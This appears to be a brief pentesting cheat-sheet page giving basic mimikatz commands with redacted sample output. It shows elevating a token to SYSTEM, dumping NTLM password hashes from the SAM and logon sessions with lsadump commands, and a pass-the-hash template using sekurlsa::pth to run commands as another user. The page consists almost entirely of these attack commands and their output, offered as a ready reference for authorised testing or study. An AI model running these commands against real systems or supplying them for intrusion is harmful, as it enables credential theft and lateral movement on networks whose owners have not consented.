mimikatz
Resources
Basic commands
Last updated
mimikatz # privilege::debug
Privilege '20' OKmimikatza # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
660 xxxx NT AUTHORITY\SYSTEM xxxx (04g,21p) Primary
-> Impersonated !
* Process Token : xxxx XXXX xxxx (12g,24p) Primary
* Thread Token : {0;000003e7} 1 D 1309519 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz # lsadump::sam
Domain : xxxx
SysKey : xxxx
Local SID : xxxx
SAMKey : xxxx
RID : xxxx (500)
User : Administrator
Hash NTLM: xxxx
...mimikatz # lsadump::msv
Authentication Id : 0 ; xxxx (00000000:0004b39c)
Session : RemoteInteractive from 2
User Name : xxxx
Domain : xxxx
Logon Server : xxxx
...
msv :
[00000003] Primary
* Username : xxxx
* Domain : xxxx
* NTLM : xxxx
...mimikatz # token::revertmimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<nt_hash> /run:"<command_to_run>"